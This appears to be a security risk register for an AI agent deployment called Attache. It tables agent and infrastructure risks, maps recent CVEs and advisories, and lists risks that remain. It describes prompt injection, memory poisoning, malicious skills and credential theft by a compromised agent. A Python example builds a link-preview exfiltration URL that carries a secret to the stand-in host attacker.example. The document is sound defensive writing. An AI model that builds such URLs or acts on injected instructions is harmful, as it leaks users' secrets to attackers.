
Risk Register

A structured look at what can go wrong, how likely it is in an Attache deployment, and what Attache does about it by default.

Agent-level risks

| Risk | Severity | How it happens | What Attache does about it | What you still need to do |
|------|----------|----------------|----------------------------|---------------------------|
| LLM data exposure | Medium | Code, messages, and file contents are sent to Anthropic/OpenAI as part of prompts | Uses Anthropic's enterprise API with a zero-retention policy; data isn't used for training | Verify your provider's data-handling terms. If clients or stakeholders care, document it explicitly. See LLM Provider Data Handling. |
| Persistent autonomous access | High | The agent has shell, file system, credential, and messaging access around the clock | Runs on a dedicated Mac mini under an isolated OS user, not your admin account. Exec defaults to allowlist mode. | Scope your 1Password vaults. Review what tools each agent actually needs. Use the secrets proxy daemon for credential access. |
| Prompt injection via messaging | High | Malicious content in Slack/Discord messages tricks the agent into unintended actions | External web content is wrapped with injection markers. Channel policies default to allowlist mode with `requireMention`. | Run separate personal and team agents (Multiplayer). Monitor logs for injection signatures. |
| Link preview exfiltration | Medium | The agent generates a URL with sensitive data embedded in it; the messaging platform renders a preview, sending the data to an attacker's server via a GET request | No built-in defense. This is a platform-level issue: it depends on whether Slack/Discord render previews for the generated URL. | Be aware this attack exists. On platforms that allow it, consider disabling link previews in agent channels. |
| Supply chain compromise | High | Malicious ClawHub skills exfiltrate data or install malware (800+ malicious packages identified in the ClawHavoc campaign; Koi Security, 2026) | Policy of never installing third-party skills directly | Enforce this strictly. Inspect and rewrite any code you pull from external sources. |
| Memory and context poisoning | Medium | An attacker injects content into agent memory files, influencing future sessions (OWASP ASI06) | Workspace isolation between personal and team agents. Memory files are segmented by agent. | Audit memory files periodically. Watch for instructions that seem to have appeared from nowhere. |
| Credential theft | High | A compromised agent reads API keys from config, keychain, or 1Password and transmits them to an external server | 1Password with scoped service account tokens. Loopback gateway binding. Secrets proxy daemon with a per-secret allowlist and DM approval. | Use scoped vaults. Configure network egress controls. |
| Cross-session contamination | Low | Context from one agent session leaks into another | OpenClaw's session architecture provides isolation | Use separate agent configs for different trust levels. Don't share workspaces between agents handling different clients. |
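The link preview exfiltration row is worth a concrete illustration. The sketch below shows only the mechanics: secret data embedded in a query string reaches the attacker the moment a preview fetcher issues the GET. The domain `attacker.example` and the parameter name `d` are hypothetical placeholders.

```python
from urllib.parse import urlencode, urlparse, parse_qs

# An injected prompt convinces the agent to emit a link like this one.
# The chat platform's preview fetcher then GETs the URL, delivering the
# secret to the attacker's server without the agent ever "sending" it.
# (attacker.example and the "d" parameter are placeholders.)
secret = "sk-live-abc123"
url = "https://attacker.example/collect?" + urlencode({"d": secret})

# The secret now rides in the query string of an outbound request:
assert parse_qs(urlparse(url).query)["d"] == [secret]
```

Disabling previews removes the automatic fetch; outbound egress controls can block the request even where previews stay enabled.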

Infrastructure-level risks

| Risk | Severity | How it happens | What Attache does about it | What you still need to do |
|------|----------|----------------|----------------------------|---------------------------|
| Gateway exposed to the internet | Critical | Gateway bound to `0.0.0.0` or forwarded through a public proxy | Attache binds to loopback by default. Tailscale for remote access. | Verify `bind: "loopback"` in your config. Test from another machine on your LAN; the connection should fail. |
| Gateway token leaked | High | Pairing code shared insecurely; the code contained the long-lived gateway token in versions before v2026.3.12 | Token auth mode (not trusted-proxy). Patched in v2026.3.12. | Upgrade to v2026.3.12+. Rotate your gateway token. Be careful how you share pairing codes. |
| SSH brute force | Low | Password-based SSH authentication allows automated login attempts | Attache's setup playbook configures key-only SSH. | Verify `PasswordAuthentication no` in your sshd_config. |
| Stale software | Medium | Known CVEs remain unpatched | Ansible-managed config enables reproducible updates. | Patch within 48 hours for high/critical issues. Run `openclaw security audit` weekly. |
| Unrestricted network egress | Medium | A compromised agent exfiltrates data to arbitrary external servers | Loopback binding limits inbound access, not outbound. | Configure DNS-level blocking and firewall rules for outbound traffic. |
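The defaults in the two tables above reduce to a small set of config choices. The sketch below is illustrative only: the key names (`bind`, `auth.mode`, `exec.security`, `requireMention`) are the ones this page references, but their exact nesting and file location are assumptions; check your Attache version's configuration reference.

```json5
{
  gateway: {
    bind: "loopback",          // never 0.0.0.0; use Tailscale for remote access
    auth: { mode: "token" },   // not trusted-proxy (see the origin-bypass advisory)
  },
  exec: {
    security: "allowlist",     // explicit paths only; avoid glob wildcards
  },
  channels: {
    policy: "allowlist",
    requireMention: true,      // the agent acts only when explicitly mentioned
  },
}
```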

How recent CVEs and advisories map to Attache deployments

Not every CVE matters equally. Here's how the recent disclosures apply to a standard Attache setup:

| Issue | Severity | Relevant to Attache? | Reasoning |
|-------|----------|----------------------|-----------|
| CVE-2026-25253: auth token theft via crafted URL | High (8.8) | Yes, mitigated | Attache ships versions past v2026.1.29. Relevant to any deployment still running an earlier version. |
| CVE-2026-22175: exec allowlist bypass via busybox/toybox | High (7.1) | Only in allowlist mode with a vulnerable version | Upgrade to v2026.2.23+. Deployments using `exec.security: "full"` aren't affected (there's no allowlist to bypass). |
| Advisory: origin bypass (WebSocket hijacking via trusted-proxy mode) | Critical | Not applicable | Attache uses `auth.mode: "token"`. The attack requires trusted-proxy. |
| Advisory: exec glob bypass (wildcard `?` crosses directory boundaries) | Moderate | Only with glob-based allowlist patterns | Upgrade to v2026.3.11+. Use explicit paths in allowlists, not wildcards. |
| Advisory: credential in pairing (setup codes contain long-lived tokens) | Moderate | Yes | Affected versions before v2026.3.12. Upgrade, and rotate your gateway token if you've ever shared a setup code. |
| Advisory: DM-to-group auth bypass (DM-paired senders treated as authorized in groups) | Low | No | This is specific to LINE. Attache uses Discord and Slack. |
Context matters

These severity ratings assume a standard Attache deployment: loopback binding, Tailscale, token auth, dedicated hardware. If your setup deviates from those defaults, your exposure may be different.
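The glob-bypass advisory describes a general bug class: a `?` wildcard that also matches the path separator. The snippet below reproduces that behavior with Python's `fnmatch`, purely to show why explicit paths beat wildcards in allowlists; it is not OpenClaw's actual matcher.

```python
from fnmatch import fnmatch

# In fnmatch (and many glob matchers), "?" consumes ANY one character,
# including "/", so a pattern meant to stay inside a directory can
# match a path that crosses a directory boundary.
assert fnmatch("a_b", "a?b")   # intended: "?" matches an ordinary character
assert fnmatch("a/b", "a?b")   # surprise: "?" also matches the separator
```

An allowlist entry written as an explicit path has no wildcard to abuse, which is why the remediation column recommends explicit paths.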

Risks you have to accept

Some things about AI agent deployments can't be fully mitigated with configuration. Documenting them honestly is better than pretending they don't exist.

Your data goes to LLM providers. Even with zero-retention agreements, your code and conversations travel to Anthropic's or OpenAI's servers for inference. This is the cost of using hosted models. If that's unacceptable for a particular project, consider routing through AWS Bedrock or Google Vertex AI, where the model provider never sees your prompts, or accept that the agent can't work on that project. Self-hosted or on-prem inference is another option if your scale justifies it.

No current defense fully eliminates prompt injection. Defense in depth — allowlists, isolation, the secrets proxy daemon, network egress controls, monitoring — reduces the likelihood and limits the blast radius. But a sufficiently clever injection against a sufficiently capable agent can still succeed. The industry hasn't cracked this, including Anthropic, OpenAI, and Google. Attache's approach is to minimize what a successful injection can reach, not to promise it can't happen.

Useful agents need real access. An agent that can't read files, run commands, or call APIs has limited utility. Any capability you give the agent is a capability an attacker inherits if they compromise it. You're always trading security for utility. Attache's four-tier model and secrets proxy make that tradeoff conscious and granular rather than all-or-nothing.

These aren't reasons to avoid agent deployments. They're reasons to deploy with appropriate controls and honest expectations.